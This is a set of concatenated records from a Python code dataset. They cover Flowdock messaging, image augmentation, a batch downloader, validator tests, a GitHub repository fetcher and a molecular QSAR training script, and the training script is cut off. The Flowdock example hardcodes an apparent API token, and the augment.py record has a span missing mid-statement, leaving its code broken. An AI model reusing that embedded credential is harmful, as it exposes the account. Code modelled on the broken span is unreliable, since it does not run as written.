{'flow_token':flow_token}\n\t\tself.msg['event'] = 'activity'\n\n\t\tauthor = {'name':author, 'avatar' :avatar}\n\t\tself.msg['author'] = author\n\n\t\tself.msg['external_thread_id'] = thread_id\n\t\tthread = {'title':thread_title, 'body':thread_body}\n\t\tself.msg['thread'] = thread\n\n\tdef __repr__(self):\n\t\treturn \"%s(%s) instance at %s\" % (self.__class__.__name__, self.flow_api_token, hex(id(self)))\n\n\tdef post(self, title):\n\t\tnew_msg = self.msg.copy()\n\t\tnew_msg.update({'title':title})\n\n\t\tprint(json.dumps(new_msg))\n\t\tprint(self.API_URL)\n\t\t\n\t\theaders = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n\n\t\tresponse = requests.post(self.API_URL, data=json.dumps(new_msg), headers = headers,)\n\t\tif not response.ok:\n\t\t\tresponse.raise_for_status()\n\t\treturn True\n\n\nif __name__ == \"__main__\":\n\t# Initialize tasks and results object\n\tinbox = MessageAPI('cbc4d9ca8000ad74058724084f929fff', author='luca', avatar = \"https://avatars.githubusercontent.com/u/3017123?v=3\",\n\t thread_title = 'FTP file download', \n\t\tthread_body='Status of file download', thread_id='jfkdjskafjadskf')\n# With required params only\n\tprint(inbox.post('File updated'))","sub_path":"flowdock/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"509188066","text":"\"\"\"\n\nCOLOR PALLETTE - Using k-means clustering to pick out the color palette from a given image\nProcess: \n(1) Read in image\n(2) Resize image\n(3) Pick out RGB values -> convert to LAB values\n(4) PLT - Axes3D Plot LAB values\n(5) Run clusters thru k-means clustering\n(6) Print out gradient of colors\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom skimage import io, color\n\n\ndef processImage(filename: str) -> list:\n image = io.imread(filename)\n return color.rgb2lab(image)\n\n\ndef plotClusters(filename: str):\n lab = processImage(filename)\n print(lab)\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.scatter(lab[0].flatten(), lab[1].flatten(), lab[2].flatten())\n plt.show()\n\n\ndef findKMeans():\n pass\n\n\ndef createPallete():\n plotClusters(\"test.jpg\")\n findKMeans()\n\n\ndef main():\n try:\n createPallete()\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"k-means.py","file_name":"k-means.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"55431041","text":"import random\nimport cv2\nimport Augmentor\nimport numpy as np\nimport os, shutil\n\nfrom distutils.dir_util import copy_tree\n\n\ndef unet_augment(sample,vertical_prob,horizontal_prob):\n image, mask= sample['image'], sample['mask']\n\n if (random.random() AUGMENT_DIR 로 복사\n\n path, dirs, _ = list(os.walk(aug_dir))[0]\n for folder in dirs:\n print('folder :', folder)\n augmnt = Augmentor.Pipeline(\n '{}/{}'.format(path, folder), output_directory='', save_format='bmp')\n\n # Add some operations to an existing pipeline.\n augmnt.flip_left_right(probability=0.4)\n # Now we add a vertical flip operation to the pipeline:\n augmnt.flip_top_bottom(probability=0.8)\n # Add a rotate90 operation to the pipeline:\n # augmnt.rotate90(probability=0.5)\n \n # number of images to augment\n augmnt.sample(aug_num)\n\n return 'Done!'\n","sub_path":"U-Net/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"394157059","text":"# Constants mapping to the Item table.\nModelNumber = 'ModelNumber'\nbstockCategory = 'bstockCategory'\nbstockSubcategory = 'bstockSubCategory'\nBrand = 'Brand'\nMSRP = 'MSRP'\nMAP = 'MAP'\nWeight = 'Weight'\nShipWeight = 'ShipWeight'\nImageLocation = 'ImageLocation'\nImageMime = 'ImageMime'\n\n# Constants mapping to the Marketplace table.\nidMarketplace = 'idMarketplace'\nmktpName = 'mktpName'\n\n# Constants mapping to the ItemDescription table.\nSKU = 'SKU'\nUPC = 'UPC'\nDescription = 'Description'\nRetailPrice = 'RetailPrice' \nmktCategory = 'mktCategory'\nmktSubcategory = 'mktSubcategory'\n","sub_path":"util/db/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"318296694","text":"from concurrent.futures import ThreadPoolExecutor\nfrom gettext import gettext as _\nfrom logging import getLogger\nfrom queue import Queue, Empty\nfrom threading import Thread, current_thread\n\nLOG = getLogger(__name__)\n\n\n# The default queuing backlog.\nBACKLOG = 1024\n# The default concurrency.\nCONCURRENT = 10\n\n\nclass Batch:\n \"\"\"\n Provides batching and concurrent execution of download requests.\n\n Attributes:\n requests (generator): A generator of requests.\n concurrent (int): The number of requests to execute in concurrently.\n iterator (RequestIterator): Used to iterate requests as they complete.\n feeder (RequestFeeder): Used to feed submit requests to the executor.\n scratchpad (dict): A scratchpad for sharing information with requests.\n\n Notes:\n * The batch should be used as a context manager.\n * Or, `shutdown()` must be called manually.\n\n Examples:\n\n >>>\n >>> from pulp3.download import HttpRequest\n >>>\n >>> url = 'http://content.org/dog.rpm'\n >>> destination = '/tmp/working/dog.rpm'\n >>> requests = (HttpRequest(url, destination) for _ in range(10))\n >>>\n >>> # Using context manager (highly recommended)\n >>>\n >>> with Batch(requests) as batch:\n >>> for request in batch.download():\n >>> if request.succeeded():\n >>> # Use the downloaded file \\o/\n >>> else:\n >>> # Log something\n >>>\n >>> # Not using context manager\n >>>\n >>> batch = Batch(requests)\n >>> try:\n >>> for request in batch.download():\n >>> if request.succeeded():\n >>> # Use the downloaded file \\o/\n >>> else:\n >>> # Log something\n >>> finally:\n >>> batch.shutdown()\n >>>\n\n \"\"\"\n\n def __init__(self, requests, concurrent=CONCURRENT, backlog=BACKLOG, **scratchpad):\n \"\"\"\n Args:\n requests (generator): A generator of requests.\n concurrent (int): The number of requests to execute in concurrently.\n backlog (int): The number of download requests kept in memory.\n **scratchpad (dict): A scratchpad for sharing information with requests.\n\n \"\"\"\n super(Batch, self).__init__()\n self.requests = requests\n self.concurrent = concurrent\n self.iterator = RequestIterator(backlog)\n self.feeder = RequestFeeder(self)\n self.scratchpad = scratchpad\n if concurrent < 2:\n raise ValueError(_('concurrent may not be < 2'))\n if backlog < concurrent:\n raise ValueError(_('backlog may not be < concurrent'))\n\n def download(self):\n \"\"\"\n Download the batch by executing all of the requests.\n\n Returns:\n RequestIterator: A request iterator.\n The iterator will render the requests in the order completed.\n\n \"\"\"\n LOG.debug(_('%(batch)s - download started'), {'batch': self})\n self.feeder.start()\n return self.iterator\n\n def shutdown(self):\n \"\"\"\n End processing and shutdown the feeder and the thread pool.\n\n Notes:\n This must be called to prevent leaking resources unless the Batch\n is used as a context manager.\n >>>\n >>> with Batch(..) as batch:\n >>> # ...\n\n \"\"\"\n LOG.debug(_('%(batch)s - shutdown'), {'batch': self})\n self.feeder.abort()\n\n def abort(self):\n \"\"\"\n Abort downloading and shutdown.\n \"\"\"\n LOG.debug(_('%(batch)s - download aborted'), {'batch': self})\n self.shutdown()\n\n def __enter__(self):\n return self\n\n def __exit__(self, *unused):\n self.shutdown()\n\n def __str__(self):\n _id = str(id(self))[-4:]\n return _('Batch: id={s} concurrent={c}').format(s=_id, c=self.concurrent)\n\n\nclass BatchExecutor(ThreadPoolExecutor):\n \"\"\"\n Batch thread pool executor.\n \"\"\"\n\n def __init__(self, concurrent=CONCURRENT):\n \"\"\"\n A thread pool executor tailored for the batch.\n The worker queue size is restricted to limit memory usage and to expedite shutdown.\n The shutdown() method is overridden to work properly with a queue\n with limited capacity.\n\n Args:\n concurrent (int): The number of requests to execute in concurrently.\n\n \"\"\"\n super(BatchExecutor, self).__init__(max_workers=concurrent)\n self._work_queue = Queue(maxsize=concurrent)\n\n def drain(self):\n \"\"\"\n Drain the input queue.\n \"\"\"\n try:\n self._work_queue.get(block=False)\n except Empty:\n pass\n\n def shutdown(self, wait=True):\n \"\"\"\n Shutdown the executor.\n Mainly needed to compensate for ThreadPoolExecutor.shutdown() that expects\n an unrestricted queue capacity. Specifically, the terminate signal (None)\n sent to the workers; is read; and blindly put back into the queue for the next\n worker. This results in a (None) message queued in the worker queue after all\n workers have terminate. The queue is drained to prevent the interpreter shutdown\n hook from blocking.\n\n Args:\n wait (bool): Wait for all workers to terminate.\n\n \"\"\"\n if self._shutdown:\n return\n super(BatchExecutor, self).shutdown(wait)\n self.drain()\n\n\nclass RequestFeeder(Thread):\n \"\"\"\n Request feeder.\n A thread used to feed each batched request into the executor.\n May be interrupted and terminated by calling abort().\n\n Attributes:\n batch (Batch): A batch to feed.\n aborted (bool): Feeding has been aborted.\n\n \"\"\"\n\n def __init__(self, batch):\n super(RequestFeeder, self).__init__(name='feeder')\n self.batch = batch\n self.aborted = False\n self.setDaemon(True)\n\n def abort(self, wait=True):\n \"\"\"\n Abort feeding and terminate.\n\n Args:\n wait (bool): Wait for thread to terminate.\n\n \"\"\"\n self.aborted = True\n if wait:\n self.join()\n\n def run(self):\n \"\"\"\n Thread (main) loop.\n Submit each request to the batch executor.\n \"\"\"\n n = 0\n iterator = self.batch.iterator\n requests = self.batch.requests\n scratchpad = self.batch.scratchpad\n with BatchExecutor(self.batch.concurrent) as executor:\n try:\n for request in requests:\n if self.aborted:\n iterator.abort()\n return\n LOG.debug(\n _('%(feeder)s - feed #%(n)d url=%(url)s'),\n {\n 'feeder': self,\n 'n': n,\n 'url': request.url\n })\n scratchpad.update(request.scratchpad)\n request.scratchpad = scratchpad\n future = executor.submit(BatchRequest(request))\n future.add_done_callback(iterator.add)\n n += 1\n except Exception as e:\n iterator.raised(e)\n n += 1\n if n:\n iterator.total = n\n else:\n iterator.empty()\n\n def __str__(self):\n _id = str(id(self))[-4:]\n return _('RequestFeeder: id={s} aborted={a}').format(s=_id, a=self.aborted)\n\n\nclass QueueIterator:\n \"\"\"\n A Queue iterator.\n Each item in the queue is a tuple of: (code, payload).\n\n Attributes:\n queue (Queue): The input queue to be iterated.\n iterated (int): The number of times `__next__()` was called.\n total (int): The total number queued. A value of `-1` indicates\n the total is not yet known.\n\n \"\"\"\n\n NEXT = 'NEXT'\n EXCEPTION = 'EXCEPTION'\n END = 'END'\n\n def __init__(self, backlog=BACKLOG):\n self.queue = Queue(maxsize=backlog)\n self.aborted = False\n self.iterated = 0\n self.total = -1\n\n def abort(self):\n \"\"\"\n Abort iteration.\n Set the abort flag and drain the queue just in case something\n is blocked on put().\n \"\"\"\n if self.aborted:\n return\n self.aborted = True\n self.empty()\n\n def put(self, code, payload=None, block=True):\n \"\"\"\n Enqueue a message.\n\n Args:\n code (str): The message code.\n payload (object): The message payload.\n block (bool): Block when queue is full (default:True).\n\n \"\"\"\n LOG.debug(\n _('%(iterator)s put: code=%(code)s payload=%(payload)s'),\n {\n 'iterator': self,\n 'code': code,\n 'payload': payload\n })\n message = (code, payload)\n self.queue.put(message, block=block)\n\n def add(self, payload):\n \"\"\"\n Add the next object to the input queue to be rendered by `__next__()`.\n\n Args:\n payload: An object to be rendered by `__next__()`.\n\n \"\"\"\n if self.aborted:\n return\n self.put(self.NEXT, payload)\n\n def raised(self, exception):\n \"\"\"\n Add a fatal exception to the input queue. The exception has been raised by\n the object providing the objects to be iterated.\n\n Args:\n exception: An exception to be raised by `__next__()`.\n\n \"\"\"\n if self.aborted:\n return\n self.put(self.EXCEPTION, exception)\n\n def drain(self):\n \"\"\":\n Drain the input queue.\n \"\"\"\n LOG.debug(_('%(iterator)s - input drained'), {'iterator': self})\n while True:\n try:\n self.queue.get(block=False)\n except Empty:\n break\n self.end()\n\n def empty(self):\n \"\"\"\n Add an message to the input queue that signals that the input\n queue will always be empty. The object feeding the queue has nothing\n to be iterated.\n \"\"\"\n self.drain()\n self.end()\n\n def end(self):\n \"\"\"\n Add an message to the input queue that marks the end of input.\n \"\"\"\n self.put(self.END)\n\n def __next__(self):\n \"\"\"\n Get the next enqueued object.\n\n Returns:\n The next enqueued object.\n\n Raises:\n StopIteration: when finished iterating.\n\n \"\"\"\n LOG.debug(_('%(iterator)s - next'), {'iterator': self})\n\n if self.aborted:\n raise StopIteration()\n if self.iterated == self.total:\n raise StopIteration()\n\n code, payload = self.queue.get()\n\n LOG.debug(\n _('%(iterator)s next: code=%(code)s payload=%(payload)s'),\n {\n 'iterator': self,\n 'code': code,\n 'payload': payload\n })\n\n # next\n if code == self.NEXT:\n self.iterated += 1\n return payload\n # fatal\n if code == self.EXCEPTION:\n raise payload\n # empty\n if code == self.END:\n raise StopIteration()\n\n def __iter__(self):\n return self\n\n def __str__(self):\n _id = str(id(self))[-4:]\n description = 'Iterator: id={s} iterated={i}/{t} aborted={a}'\n return _(description.format(\n s=_id,\n i=self.iterated,\n t=self.total,\n a=self.aborted))\n\n\nclass FutureIterator(QueueIterator):\n \"\"\"\n A queue iterator that expects the payload to be a `concurrent.futures.Future`.\n \"\"\"\n\n def __next__(self):\n \"\"\"\n Get the next future and propagate any raised exceptions.\n\n Returns:\n The next `Future.result()`\n\n Raises:\n Anything raised by the object executed.\n\n \"\"\"\n future = super(FutureIterator, self).__next__()\n exception = future.exception()\n if exception:\n LOG.debug(\n _('%(iterator)s - raising: %(exception)s'),\n {\n 'iterator': self,\n 'exception': exception\n })\n raise exception\n else:\n return future.result()\n\n\nclass RequestIterator(FutureIterator):\n \"\"\"\n Provided for semantic clarity.\n \"\"\"\n pass\n\n\nclass BatchRequest:\n \"\"\"\n Batched request wrapper.\n Ensures the request is returned after being executed in the pool.\n\n Attributes:\n request (Request): The wrapped request.\n\n \"\"\"\n\n def __init__(self, request):\n \"\"\"\n\n Args:\n request (Request): The wrapped request.\n\n Returns:\n request (Request): The wrapped request.\n\n Raises:\n Whatever is raised by request()\n\n \"\"\"\n self.request = request\n\n def __call__(self):\n thread = current_thread()\n LOG.debug(_(\n '%(request)s thread=%(thread)s - started'),\n {\n 'thread': thread.getName(),\n 'request': self\n })\n\n try:\n self.request()\n return self.request\n finally:\n LOG.debug(_(\n '%(request)s thread=%(thread)s - end'),\n {\n 'thread': thread.getName(),\n 'request': self\n })\n\n def __str__(self):\n return str(self.request)\n","sub_path":"pulp3/download/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":13618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"405129152","text":"'''\nCreated on 12/06/2014\n\n:author: alfred\n'''\nfrom unittest import TestCase\n\nfrom dirty_models.fields import StringIdField\nfrom dirty_validators.complex import ModelValidate\nfrom werkzeug.exceptions import NotFound\n\nfrom mc_be.commons.fields import ModelIdField\nfrom mc_be.commons.filter_list import FilterList\nfrom mc_be.commons.models.models import PersistentModel\nfrom mc_be.commons.streams.iterator import ListIterator\nfrom mc_be.commons.validators import Unique, RefModelId, EqualField, NotEqualField\nfrom tests import BaseTestCase, mock_session_org_type\n\n\nclass FakeModel(PersistentModel):\n label = StringIdField()\n second_id = StringIdField()\n model_ref = ModelIdField()\n field_1 = StringIdField()\n field_2 = StringIdField()\n\n def get_resource_id(self):\n return 'fake'\n\n\nclass FakeService:\n\n def __init__(self):\n self.results = [FakeModel(id='aaa', second_id='bbb', label='ccc')]\n self.result_load = FakeModel(id='aaa', second_id='bbb', label='ccc')\n\n def list_all(self, filter_list=None, paging=None):\n self.filter_list = filter_list\n\n return ListIterator(self.results)\n\n def load(self, id):\n if self.result_load:\n return self.result_load\n raise NotFound(\"Not found\")\n\n def build_filter_list(self, params):\n self.params = params\n return FilterList()\n\n\nclass UniqueTest(BaseTestCase, TestCase):\n\n def setUp(self):\n super(UniqueTest, self).setUp()\n self.service = FakeService()\n\n def test_success(self):\n class FakeValidator(ModelValidate):\n label = Unique(filter_name='label', service=self.service)\n\n self.service.results = []\n\n model = FakeModel(label='aaa')\n\n validator = FakeValidator()\n\n self.assertTrue(validator.is_valid(model), validator.messages)\n self.assertDictEqual(self.service.params, {'label': 'aaa'})\n\n def test_fail(self):\n class FakeValidator(ModelValidate):\n label = Unique(filter_name='label', service=self.service)\n\n model = FakeModel(label='ccc')\n\n validator = FakeValidator()\n\n self.assertFalse(validator.is_valid(model), validator.messages)\n self.assertDictEqual(validator.messages, {'label': {'alreadyUsed': \"'ccc' is already used by item 'aaa'\"}})\n\n def test_success_same_id(self):\n class FakeValidator(ModelValidate):\n label = Unique(filter_name='label', service=self.service)\n\n model = FakeModel(label='ccc', id='aaa')\n\n validator = FakeValidator()\n\n self.assertTrue(validator.is_valid(model), validator.messages)\n self.assertDictEqual(self.service.params, {'label': 'ccc'})\n\n def test_fail_multi_id(self):\n class FakeValidator(ModelValidate):\n label = Unique(filter_name='label', service=self.service, identifiers=['id', 'second_id'])\n\n model = FakeModel(label='ccc', id='aaa')\n\n validator = FakeValidator()\n\n self.assertFalse(validator.is_valid(model), validator.messages)\n self.assertDictEqual(validator.messages, {'label': {'alreadyUsed': \"'ccc' is already used by item 'aaa:bbb'\"}})\n\n def test_success_multi_id(self):\n class FakeValidator(ModelValidate):\n label = Unique(filter_name='label', service=self.service, identifiers=['id', 'second_id'])\n\n model = FakeModel(label='ccc', second_id='bbb', id='aaa')\n\n validator = FakeValidator()\n\n self.assertTrue(validator.is_valid(model), validator.messages)\n self.assertDictEqual(self.service.params, {'label': 'ccc'})\n\n\nclass RefModelIdTest(BaseTestCase, TestCase):\n\n def setUp(self):\n super(RefModelIdTest, self).setUp()\n self.service = FakeService()\n\n def test_success(self):\n validator = RefModelId(service=self.service)\n\n self.assertTrue(validator.is_valid('aaaa'))\n\n def test_fail_not_found(self):\n validator = RefModelId(service=self.service)\n self.service.result_load = False\n\n self.assertFalse(validator.is_valid('aaaa'))\n self.assertDictEqual(validator.messages, {'notFound': \"Item 'aaaa' not found\"})\n\n def test_success_permission_not_modified(self):\n validator = RefModelId(service=self.service, check_permission='read')\n\n self.assertTrue(validator.is_valid('aaaa', is_modified=False))\n\n @mock_session_org_type('provider')\n def test_success_permission_modified(self):\n validator = RefModelId(service=self.service, check_permission='read')\n\n with self.app.test_request_context():\n self.app.preprocess_request()\n self.assertTrue(validator.is_valid('aaaa', is_modified=True))\n\n @mock_session_org_type('provider')\n def test_fail_permission_modified(self):\n validator = RefModelId(service=self.service, check_permission='shake')\n\n with self.app.test_request_context():\n self.app.preprocess_request()\n self.assertFalse(validator.is_valid('aaaa', is_modified=True))\n self.assertDictEqual(validator.messages,\n {'notAllowed': \"Item 'aaaa' is not allowed by permission 'shake'\"})\n\n\nclass EqualFieldTest(TestCase):\n\n def test_success(self):\n class FakeValidator(ModelValidate):\n field_1 = EqualField(field_name='field_2')\n model = FakeModel(field_1='aaa', field_2='aaa')\n\n validator = FakeValidator()\n\n self.assertTrue(validator.is_valid(model), validator.messages)\n\n def test_fail(self):\n class FakeValidator(ModelValidate):\n field_1 = EqualField(field_name='field_2')\n model = FakeModel(field_1='aaa', field_2='bbb')\n\n validator = FakeValidator()\n\n self.assertFalse(validator.is_valid(model), validator.messages)\n self.assertDictEqual(validator.messages,\n {'field_1': {'notEqualFieldValue': \"Item value: aaa must be equal to field_2 value: bbb\"}})\n\n\nclass NotEqualFieldTest(TestCase):\n\n def test_success(self):\n class FakeValidator(ModelValidate):\n field_1 = NotEqualField(field_name='field_2')\n model = FakeModel(field_1='aaa', field_2='bbb')\n\n validator = FakeValidator()\n\n self.assertTrue(validator.is_valid(model), validator.messages)\n\n def test_fail(self):\n class FakeValidator(ModelValidate):\n field_1 = NotEqualField(field_name='field_2')\n model = FakeModel(field_1='aaa', field_2='aaa')\n\n validator = FakeValidator()\n\n self.assertFalse(validator.is_valid(model), validator.messages)\n self.assertDictEqual(validator.messages,\n {'field_1': {'equalFieldValue': \"Item value: aaa can not be equal to field_2 value: aaa\"}})\n","sub_path":"mc-pybe-release-smip-R4/tests/commons/validators/tests_validators.py","file_name":"tests_validators.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"219467320","text":"import requests, json\nfrom multiprocessing import Process, Manager\nfrom process import extract_repo_fields\n\n\ndef list_repos(token, since):\n res = requests.get(\n f'https://api.github.com/repositories?since={since}',\n headers={'Authorization': f'token {token}'}\n )\n return json.loads(res.content.decode('utf-8'))\n\n\ndef get_repo_details(owner, name, token):\n repo_details = json.loads(requests.get(\n f'https://api.github.com/repos/{owner}/{name}',\n headers={'Authorization': f'token {token}'}\n ).content.decode('utf-8'))\n return repo_details\n\n\ndef get_repo_details_parallel(repos_details, owner, name, token):\n repo_details = json.loads(requests.get(\n f'https://api.github.com/repos/{owner}/{name}',\n headers={'Authorization': f'token {token}'}\n ).content.decode('utf-8'))\n repos_details.append(repo_details)\n\n\ndef get_repos(token, repos):\n repos_details = []\n for repo in repos:\n try:\n owner = repo['owner']['login']\n name = repo['name']\n repo_details = get_repo_details(owner, name, token)\n repo_fields = extract_repo_fields(repo_details)\n repos_details.append(repo_fields)\n except Exception as e:\n print(f'Failed extracting information for {repo[\"id\"]}')\n pass\n return repos_details\n\n\ndef get_repos_parallel(token, repos):\n with Manager() as manager:\n repos_details = manager.list()\n repo_get_processes = []\n for repo in repos:\n owner = repo['owner']['login']\n name = repo['name']\n process = Process(target=get_repo_details_parallel, args=(repos_details, owner, name, token))\n process.start()\n repo_get_processes.append(process)\n for p in repo_get_processes:\n p.join()\n\n repo_field_details = []\n for repo_details in repos_details:\n try:\n repo_fields = extract_repo_fields(repo_details)\n repo_field_details.append(repo_fields)\n except:\n raise\n return repo_field_details\n\n\ndef list_and_get_repo_details(token, since):\n repos = list_repos(token, since)\n repos_details = get_repos(token, repos)\n # repos_details = get_repos_parallel(token, repos)\n return repos_details\n\n\ndef get_rate_remaining(token):\n res = requests.get(\n f'https://api.github.com/rate_limit',\n headers={'Authorization': f'token {token}'}\n )\n rate_details = json.loads(res.content.decode('utf-8'))\n return rate_details['rate']['remaining']","sub_path":"ghrepos-loader/read_ghrepos_serial.py","file_name":"read_ghrepos_serial.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"580855124","text":"from timeit import default_timer as time\nimport os\nimport sys\nimport logging\nfrom datetime import datetime\nfrom argparse import Namespace\nimport optuna\nimport pandas as pd\nimport numpy as np\nimport torch\nimport chemprop.utils\n\nfrom absl import app\nfrom absl import flags\n\nimport rdkit\nprint(rdkit.__version__)\n\nDELQSAR_ROOT = os.path.abspath(__file__ + '/../../')\nsys.path += [os.path.dirname(DELQSAR_ROOT)]\n\nRESULTS_FILE = os.path.join(DELQSAR_ROOT, 'experiments', 'all_results.csv')\n\nfrom del_qsar import featurizers, splitters, models, losses\nfrom del_qsar.enrichments import R_from_z, R_ranges\n\n\nFLAGS = flags.FLAGS\nflags.DEFINE_string('csv', 'triazine_lib_sEH_SIRT2_QSAR.csv', 'csv filename')\nflags.DEFINE_list('exp', ['sEH_[strep]_tot'], 'Column header(s) for data counts: experiment')\nflags.DEFINE_list('beads', ['beads-linker-only_[strep]_tot'], 'Column header(s) for data counts: beads')\nflags.DEFINE_enum('featurizer', 'graph', ['graph'], 'How molecules are featurized')\nflags.DEFINE_list('splitter', ['random'], 'How molecules are split for training/testing') \nflags.DEFINE_integer('seed', 0, 'Random seed for data splitting and weight initialization')\n\nflags.DEFINE_enum('model_type', 'MoleculeModel', ['MoleculeModel'], 'Model type')\nflags.DEFINE_enum('task_type', 'regression', ['regression', 'classification'], 'Task type')\n\nflags.DEFINE_enum('threshold_type', 'percentile', ['percentile', 'fixed'], \n 'Threshold type (for classification only)')\nflags.DEFINE_float('threshold_val', 99.99, 'Threshold value; exact value or percentile (for classification only)')\n\nflags.DEFINE_enum('loss_fn_train', 'nlogprob', ['nlogprob', 'MSE', 'BCE'], \n 'Loss function during training (note: classifiers automatically use BCE)')\n\nflags.DEFINE_integer('depth', 6, 'Number of message-passing steps')\nflags.DEFINE_integer('hidden_size', 1500, 'Size of hidden layers in MPN')\nflags.DEFINE_integer('ffn_num_layers', 2, 'Number of layers in FFN after MPN encoding')\n\nflags.DEFINE_float('lr', None, 'Initial learning rate')\nflags.DEFINE_integer('max_epochs', 100, 'Maximum number of epochs')\nflags.DEFINE_integer('patience', 5, 'Patience')\nflags.DEFINE_float('max_norm', 5, 'Max norm')\nflags.DEFINE_float('dropout', 0, 'Dropout rate')\nflags.DEFINE_integer('num_workers', 40, 'Number of workers for loading data')\n\nflags.DEFINE_string('out', None, 'Experiment label (subfolder)')\n\nflags.DEFINE_string('device', 'cuda:0', 'Device (set to cuda:0 if using GPU)')\n\nflags.DEFINE_integer('n_trials', 1, 'Number of optuna trials to run')\n\nif not os.path.isdir(os.path.join(DELQSAR_ROOT, 'experiments', 'results')):\n os.mkdir(os.path.join(DELQSAR_ROOT, 'experiments', 'results'))\n \ndt = datetime.today()\nDATE = os.path.join(DELQSAR_ROOT, 'experiments', 'results', \n f'{dt.year}-{str(dt.month).zfill(2)}-{str(dt.day).zfill(2)}')\nif not os.path.isdir(DATE):\n os.mkdir(DATE)\n\n \ndef objective(trial):\n start = time() \n \n INIT_LR = FLAGS.lr\n DROPOUT = FLAGS.dropout\n DEPTH = FLAGS.depth\n HIDDEN_SIZE = FLAGS.hidden_size\n FFN_NUM_LAYERS = FLAGS.ffn_num_layers\n\n SAVE_ROOT = os.path.join(DATE, FLAGS.out)\n if not os.path.isdir(SAVE_ROOT):\n os.mkdir(SAVE_ROOT)\n \n SAVE_SUBFOLDER = os.path.join(SAVE_ROOT, '1_log_files')\n if not os.path.isdir(SAVE_SUBFOLDER):\n os.mkdir(SAVE_SUBFOLDER)\n \n LOG_FILE = os.path.join(SAVE_SUBFOLDER, 'run.log')\n \n logging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s: %(message)s',\n handlers=[\n logging.StreamHandler(sys.stdout),\n ]\n )\n with open(LOG_FILE, 'a') as lf:\n logging.info(f'Trial #{trial.number}')\n lf.write(f'{datetime.now()} INFO: Trial #{trial.number}\\n')\n logging.info(f'Parameters: {trial.params}')\n lf.write(f'{datetime.now()} INFO: Parameters: {trial.params}\\n\\n')\n logging.info('FLAGS:')\n lf.write(f'{datetime.now()} INFO: FLAGS:\\n')\n for f in FLAGS.get_key_flags_for_module(sys.argv[0]):\n logging.info(f.serialize())\n lf.write(f'{datetime.now()} INFO: ' + f.serialize() + '\\n')\n # GPU?\n logging.info(f'CUDA available? {torch.cuda.is_available()}')\n lf.write(f'{datetime.now()} INFO: CUDA available? {torch.cuda.is_available()}\\n')\n\n # Get data\n df_data = pd.read_csv(os.path.join(DELQSAR_ROOT, 'experiments', 'datasets', FLAGS.csv))\n if 'triazine' in FLAGS.csv:\n for col in df_data.columns:\n if ' ' in col:\n df_data = df_data.rename(columns={col: col.replace(' ', '_')})\n\n # Extract counts\n exp_counts = np.array(df_data[FLAGS.exp], dtype='int')\n bead_counts = np.array(df_data[FLAGS.beads], dtype='int')\n exp_tot = np.sum(exp_counts, axis=0) # column sums\n bead_tot = np.sum(bead_counts, axis=0)\n logging.info(f'{len(df_data)} total compounds')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: {len(df_data)} total compounds\\n')\n\n # Featurizer\n smis = df_data['smiles']\n targets = []\n for i in range(exp_counts.shape[0]):\n targets_for_compound = []\n for j in range(exp_counts.shape[1]): \n targets_for_compound.append(R_from_z(bead_counts[i, j], bead_tot[j], \n exp_counts[i, j], exp_tot[j], 0).tolist())\n targets.append(targets_for_compound)\n featurizer = featurizers.GraphFeaturizer(smis, targets)\n x = featurizer.prepare_x()\n\n # Define different splits\n if FLAGS.splitter[0] == 'random':\n splitter = splitters.RandomSplitter()\n train_slice, valid_slice, test_slice = splitter(x, df_data, seed=FLAGS.seed)\n print('Random split:')\n print(f'Train: {train_slice}')\n print(f'Valid: {valid_slice}')\n print(f'Test: {test_slice}')\n with open(LOG_FILE, 'a') as lf:\n lf.write('\\nRandom split:\\n')\n lf.write(f'Train: {train_slice}\\n')\n lf.write(f'Valid: {valid_slice}\\n')\n lf.write(f'Test: {test_slice}\\n\\n')\n else:\n if len(FLAGS.splitter) == 1:\n splitter = splitters.OneCycleSplitter(FLAGS.splitter, LOG_FILE)\n elif len(FLAGS.splitter) == 2:\n splitter = splitters.TwoCycleSplitter(FLAGS.splitter, LOG_FILE)\n elif len(FLAGS.splitter) == 3:\n splitter = splitters.ThreeCycleSplitter(FLAGS.splitter, LOG_FILE)\n else:\n raise ValueError('Unknown splitter')\n train_slice, valid_slice, test_slice = splitter(x, df_data, seed=FLAGS.seed)\n\n logging.info(f'Train length: {len(train_slice):12d}')\n logging.info(f'Valid length: {len(valid_slice):12d}')\n logging.info(f'Test length: {len(test_slice):12d}')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: Train length: {len(train_slice):12d}\\n')\n lf.write(f'{datetime.now()} INFO: Valid length: {len(valid_slice):12d}\\n')\n lf.write(f'{datetime.now()} INFO: Test length: {len(test_slice):12d}\\n')\n\n # For binary classification: get ground truth labels\n if FLAGS.task_type == 'classification':\n R, R_lb, R_ub = R_ranges(bead_counts[:, 0], bead_tot[0], exp_counts[:, 0], exp_tot[0])\n if FLAGS.threshold_type == 'percentile':\n threshold_R = np.percentile(R[train_slice], FLAGS.threshold_val)\n else:\n threshold_R = FLAGS.threshold_val\n logging.info(f'Threshold (R): {threshold_R}')\n with open(LOG_FILE, 'a') as lf:\n lf.write(f'{datetime.now()} INFO: Threshold (R): {threshold_R}\\n')\n true_labels_R = 